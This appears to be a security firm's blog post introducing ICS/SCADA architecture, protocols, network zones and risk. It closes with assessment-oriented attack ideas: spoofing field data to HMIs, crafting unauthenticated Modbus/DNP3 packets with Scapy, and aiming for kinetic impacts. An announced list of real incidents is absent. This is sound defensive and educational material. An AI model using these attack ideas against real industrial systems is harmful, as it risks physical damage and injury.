At the uppermost level, the HMIs and SCADA servers oversee and direct the lower levels, either based upon a set of inputs or a human operator. Typically data from the SCADA servers is gathered by the HMI, then displayed to engineering workstations for ICS engineers’ consumption.


The middle layer typically collects and processes from inputs and outputs between layers. The devices performing at this layer, known as Field Controllers, include programmable logic controllers (PLCs), intelligence electronic devices (IEDs) and remote terminal units (RTUs). Field Controllers can coordinate lower level actions based upon upper level directions, or send process data and statistics about the lower level to the upper level.


At the lowest level, devices known as Field Devices are responsible for the moving parts and sensors directing the movement of pumps, robotic arms and other process-related machinery. Additionally, they typically include various sensors to monitor processes and pass data along to the middle layer (i.e. Field Controllers) for data processing.

Communication links between the layers are often required in ICS environments and this communication typically utilizes different protocols. Communication between the SCADA server located in the upper layer and Field Controllers in the middle layer typically utilize common protocols such as DNP3 or Modbus. For communication between Field Controllers and lower level Field Devices, commonly used protocols include HART, Foundation Fieldbus and ProfiBus.

Although designing networks that meet the ICS requirements can be challenging, organizations with ICS typically achieve this by having three zones in their infrastructure:

Enterprise Zones contain the typical corporate enterprise network. In this network are standard corporate services such as email, file/print, web, ERP, etc. In this zone all of the business servers and employee workstations reside.

The ICS demilitarized zones (DMZs) typically allow indirect access to data generated by the ICS system. In this zone there are typically the secondary Historian, as well as some web and terminal applications.

Finally, the Process Control Zones are where the three layers of ICS systems reside. This zone should be inaccessible from the Enterprise Zone and limited to read-only access from the HMIs and SCADA servers.

ICS and Risk

ICS technology was originally designed without consideration of authentication, encryption, anti-malware tools, firewalls or other defense mechanisms. The lack of such considerations influences how these systems are designed and operated. For example, one of the traditional IT risk mitigation strategies is the timely application of security patches to vulnerable systems. While traditional IT systems can absorb downtime, most ICS systems incur significant costs in loss of production preventing them from being patched on a routine basis. Additionally, unlike traditional IT systems, a failed update on an ICS device could have catastrophic consequences such as contaminated food, blackouts, severe injury, or death.

While a determined attacker may gain direct access to the ICS environment via social engineering or physical attacks, it’s more likely they will pivot from the corporate network leveraging trusted network connections to SCADA servers and HMIs. Even if the attacker doesn’t manage to exfiltrate sensitive data or perform sensitive actions, the fines, investigations and regulatory reprisals generated with a breach to the ICS environment could prove financially catastrophic for organizations. The following are real-world ICS incidents and attacks:

Although attacks like STUXNET may seem like an easy way to cause mayhem and destruction, several special considerations should be taken into account when attacking ICS:

  • If an attacker can intercept and modify data between Field Devices and Field Controllers, it is possible to feed false data back to HMIs. The HMI will present inaccurate data causing the human operators to make potentially dangerous changes based on this inaccurate data. Proof of a successful man-in-the-middle attack that alters data like this will likely top the list of critical findings.
  • Many Field Controllers require no authentication, allowing commands to be issued by any system on the network. Leveraging tools such as Scapy, Modbus or DNP3 packets can be crafted with ease.
  • IT knowledge, when combined with process knowledge, can be leveraged to cause specific kinetic impacts through cyber means; that is the key to the ‘big boom’ Hollywood scenarios. A Proof of Concept attack demonstrating an attack like this will make for a 5-star report.

In our next blog post we’ll walk through a typical ICS/SCADA security assessment, including a description of each of the major phases, what to look out for, and common issues and misconfigurations we’ve seen in the field.